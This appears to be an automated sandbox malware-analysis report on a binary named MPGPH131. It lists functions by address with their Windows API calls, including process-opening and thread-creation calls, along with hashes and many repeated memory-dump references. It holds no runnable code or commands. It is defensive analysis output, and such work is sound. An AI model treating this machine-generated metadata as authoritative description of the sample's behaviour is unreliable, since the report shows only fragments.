Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction ID: 6529fcfbb46cf998987f74c5b43e0019763d66c8205c738b590a08474c14a440
Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction Fuzzy Hash: 40412372900109DBDB25DF6CD8816AEBBA6FF44310F16066BF804EB345D730DE1087A5

Function 0064CD02 Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00571FDE

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 322cf9d13eedde78652f7e60c3ec681ba757b9497fc64ac9a7ad59a43de402ea
Instruction ID: 6516bdd202d6418eafa5fb23458baac5ef8d701f744f5dda222c81d0f3a023c0
Opcode Fuzzy Hash: 322cf9d13eedde78652f7e60c3ec681ba757b9497fc64ac9a7ad59a43de402ea
Instruction Fuzzy Hash: 20012B3580020D67C714AFA8EC014897FAEDF02360B508239F9189B540FB70E590C7E5

Function 00663E63 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,0064B16C,?), ref: 00663EA4

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 04e187e810cf988ca7cc8c0e6407d37c740b43530f1fce4aef8645a3d689e945
Instruction ID: 081253c19989c5f338ce8f7533c75637d4145492a353ffa63e3000233f55b81d
Opcode Fuzzy Hash: 04e187e810cf988ca7cc8c0e6407d37c740b43530f1fce4aef8645a3d689e945
Instruction Fuzzy Hash: 8DF0B432A00235669B326F728D05B9B374BAF41761B154117BC059A380CB72FE0486F4

Function 0066489D Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 006648CF

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 20874c1e6fc91679fa91d72bfc8f65db2df595145dc37c2741a4156bf62e72f1
Instruction ID: eb9db9aeaed8543a4721170cfceb6434afb23abf1391c4ac7680d72ff7f1d231
Opcode Fuzzy Hash: 20874c1e6fc91679fa91d72bfc8f65db2df595145dc37c2741a4156bf62e72f1
Instruction Fuzzy Hash: 8EE06D311026A19AE72177A69C05BEB368B9F823B1F15133EAC45A7691DF60DC0082E5

Function 00829B8C Relevance: 1.3, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00829BB7

Memory Dump Source

Source File: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmp, Offset: 006D2000, based on PE: true

Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 788cc3e1962191186ccee4a8cb5f4d0540ef6b6224f83d3fc9c4b19a6febbf38
Instruction ID: c0821fa9178ffc9cd42eaffe433bd1444831d6ee6a7c36ab13f279e4cf067211
Opcode Fuzzy Hash: 788cc3e1962191186ccee4a8cb5f4d0540ef6b6224f83d3fc9c4b19a6febbf38
Instruction Fuzzy Hash: 03E0EC7530012C9BDB10CE4CE844B5B339EF78A330F108011F549D7605C235EC519771

Non-executed Functions

Function 0057A720 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 324libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?), ref: 0057A7CD
GetProcAddress.KERNEL32(00000000,?), ref: 0057A7DD
GetModuleHandleA.KERNEL32(?), ref: 0057A845
GetProcAddress.KERNEL32(00000000,?), ref: 0057A84C
OpenProcess.KERNEL32(00000040,00000000,?), ref: 0057A858
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000), ref: 0057A8D1
CloseHandle.KERNEL32(?), ref: 0057A908
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0057A98D
ResetEvent.KERNEL32(00000000), ref: 0057A996
CreateThread.KERNEL32(00000000,00000000,0057A5B0,?,00000000,00000000), ref: 0057A9BA
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0057A9C6
RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 0057AA0C
CloseHandle.KERNEL32(?), ref: 0057AA4A
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000001), ref: 0057AA56
CloseHandle.KERNEL32(?), ref: 0057AA71
CloseHandle.KERNEL32(00000000), ref: 0057AAD5

Strings

File, xrefs: 0057A93C

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Handle$Close$Process$AddressCreateCurrentEventModuleProcString$AnsiObjectOpenResetSingleThreadUnicodeWait
String ID: File
API String ID: 3800441322-749574446
Opcode ID: 023fd1c83c5b7fc3437d01ddeefe0d0d986b893609edcfaedbdd372af587f8a4
Instruction ID: 9ef2f738bcd1f5ad8afe384794c0842c2bcb31849f21d9998f27885346bcb958
Opcode Fuzzy Hash: 023fd1c83c5b7fc3437d01ddeefe0d0d986b893609edcfaedbdd372af587f8a4
Instruction Fuzzy Hash: AEC1DE70D002489FDF15CFA4DD45BAEBBB6FF45300F10406DE909AB292E770A984DBA2

Function 0064B41B Relevance: 15.2, APIs: 10, Instructions: 200fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 0064B4B3
GetLastError.KERNEL32(?,?), ref: 0064B4BD
FindFirstFileW.KERNEL32(?,?,?,?), ref: 0064B4D4
GetLastError.KERNEL32(?,?), ref: 0064B4DF
FindClose.KERNEL32(00000000,?,?), ref: 0064B4EB
___std_fs_open_handle@16.LIBCPMT ref: 0064B5A4

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
String ID:
API String ID: 2340820627-0
Opcode ID: f082f53864257c284923488ee1574ed18d60b235756e587150fc89b6009ddfc4
Instruction ID: 1f44d4dbd892cc042da00556544a7be278ad3c825b1f5cfcca071788bb88a6f2
Opcode Fuzzy Hash: f082f53864257c284923488ee1574ed18d60b235756e587150fc89b6009ddfc4
Instruction Fuzzy Hash: 4A71AF74A006199FDB64CF28DC84BE9B7BABF05320F145259E859E3390DB70DE51CB91

Function 0066DEC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,0066E1D6,?,?), ref: 0066DF5D
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,0066E1D6,?,?), ref: 0066DF86
GetACP.KERNEL32(?,?,0066E1D6,?,?), ref: 0066DF9B

Strings

ACP, xrefs: 0066DEE2
OCP, xrefs: 0066DF18

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 79c7d47995b193324c58e5e75f8114ae7c659694a9d4b6726cc0bd538c67ef2b
Instruction ID: 582db58c97e3b72a6c2fc13f78f59d5fc296bd373acdf24ed7991e9530d96352
Opcode Fuzzy Hash: 79c7d47995b193324c58e5e75f8114ae7c659694a9d4b6726cc0bd538c67ef2b
Instruction Fuzzy Hash: DB218E72F00100AADB349F54C901BE777A7EF94B64B5A8564E90BDB311EB32DE81C390

Function 0066E0A0 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0066364B: GetLastError.KERNEL32(?,?,0065DD18,?,?,00000003,00652013,?,00651F82,?,00000016,00652191), ref: 0066364F
Part of subcall function 0066364B: SetLastError.KERNEL32(00000000,00000016,00652191,?,?,?,?,?,00000000,?,?,?,?,?,?,00572D8D), ref: 006636F1

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0066E1A8
IsValidCodePage.KERNEL32(?), ref: 0066E1E6
IsValidLocale.KERNEL32(?,00000001), ref: 0066E1F9
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0066E241
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0066E25C

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 709ee7b6debb93d18019e9f73d863c524567b07cf52a2501fb9e25b9b7fdfc49
Instruction ID: fb3ce0a060b416d43efb0df03640acfce04c172d516f02590c8452a935629437
Opcode Fuzzy Hash: 709ee7b6debb93d18019e9f73d863c524567b07cf52a2501fb9e25b9b7fdfc49
Instruction Fuzzy Hash: D7518E75A00209ABEF10EFA5CC41AEAB3BEAF19700F144469E914EB291E7719A45CB61

Function 0066D72B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0066364B: GetLastError.KERNEL32(?,?,0065DD18,?,?,00000003,00652013,?,00651F82,?,00000016,00652191), ref: 0066364F
Part of subcall function 0066364B: SetLastError.KERNEL32(00000000,00000016,00652191,?,?,?,?,?,00000000,?,?,?,?,?,?,00572D8D), ref: 006636F1

GetACP.KERNEL32(?,?,?,?,?,?,00660A83,?,?,?,?,?,-00000050,?,?,?), ref: 0066D7EA
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00660A83,?,?,?,?,?,-00000050,?,?), ref: 0066D821
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0066D984

Strings

utf8, xrefs: 0066D8F3

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: d178783fe878e5421caec7947fa4b3d8c89c68801f08b1d6f517acc1e223d25d
Instruction ID: 553310b9b14041d713b3b1d060bd604b726ea019522e66b7e3f86c415581c3bd
Opcode Fuzzy Hash: d178783fe878e5421caec7947fa4b3d8c89c68801f08b1d6f517acc1e223d25d
Instruction Fuzzy Hash: F371E472F00206AADB24AB74CC46BAA77AEEF45700F14452DF905DB282EB70ED41C7A5

Function 005DAE90 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005DAEB3
std::_Lockit::_Lockit.LIBCPMT ref: 005DAED5
std::_Lockit::~_Lockit.LIBCPMT ref: 005DAEF5
std::_Lockit::~_Lockit.LIBCPMT ref: 005DAF1F
std::_Lockit::_Lockit.LIBCPMT ref: 005DAF8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005DAFD9
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005DAFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 005DB088
std::_Facet_Register.LIBCPMT ref: 005DB095

Strings

bad locale name, xrefs: 005DB0AF

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: bef9261acfba66b5efe00cbb0f19e2dd582883317f0af8d298bcd07358f77110
Instruction ID: 95b217e7cb6ff3b8aa36c639a565b4aac22c5bcd11fd66564ef9f96481def414
Opcode Fuzzy Hash: bef9261acfba66b5efe00cbb0f19e2dd582883317f0af8d298bcd07358f77110
Instruction Fuzzy Hash: 4D618DB5D00205DFDB60DFA8D885BAEBFB6BF05310F18445AE804A7381E734E905CBA6

Function 00573770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005737E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00573835
__Getctype.LIBCPMT ref: 0057384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0057386A
std::_Lockit::~_Lockit.LIBCPMT ref: 005738FF

Strings

0:W, xrefs: 00573848
bad locale name, xrefs: 0057391C

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:W$bad locale name
API String ID: 1840309910-2737869779
Opcode ID: 9381c707c66c564f7b22c0fcbf03d88a6683722809032e7b28b59172383cee8e
Instruction ID: 92871af02441c2d2dcb8bca30dac6d47413c49ab72061fc45fe1b9bb92acdaf6
Opcode Fuzzy Hash: 9381c707c66c564f7b22c0fcbf03d88a6683722809032e7b28b59172383cee8e
Instruction Fuzzy Hash: E15150F1D012589BDF50DFA4D88579EFBB8AF14314F148169EC08AB341E775EA08DBA2

Function 00650880 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006508B7
___except_validate_context_record.LIBVCRUNTIME ref: 006508BF
_ValidateLocalCookies.LIBCMT ref: 00650948
__IsNonwritableInCurrentImage.LIBCMT ref: 00650973
_ValidateLocalCookies.LIBCMT ref: 006509C8

Strings

csm, xrefs: 0065095D
Cd, xrefs: 00650965, 0065096E, 0065097F

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: Cd$csm
API String ID: 1170836740-2886570576
Opcode ID: fc7b2e5c92e692e5d36ecfa574e4b256b5d0de93c623f04b588b1cd24641c742
Instruction ID: 7b0b1f0043ee3c45a0ca33f4b0a8e3872e780dcc7e02a6078445eb5bb2915b21
Opcode Fuzzy Hash: fc7b2e5c92e692e5d36ecfa574e4b256b5d0de93c623f04b588b1cd24641c742
Instruction Fuzzy Hash: 6341C634A00209ABEF10DF68C880AEE7BB7BF45325F149559EC189B356D731EA49CB91

Function 0064C05E Relevance: 10.7, APIs: 7, Instructions: 153threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0064C086
GetCurrentThreadId.KERNEL32 ref: 0064C0A3
GetCurrentThreadId.KERNEL32 ref: 0064C0C4
GetCurrentThreadId.KERNEL32 ref: 0064C147
__Xtime_diff_to_millis2.LIBCPMT ref: 0064C15F
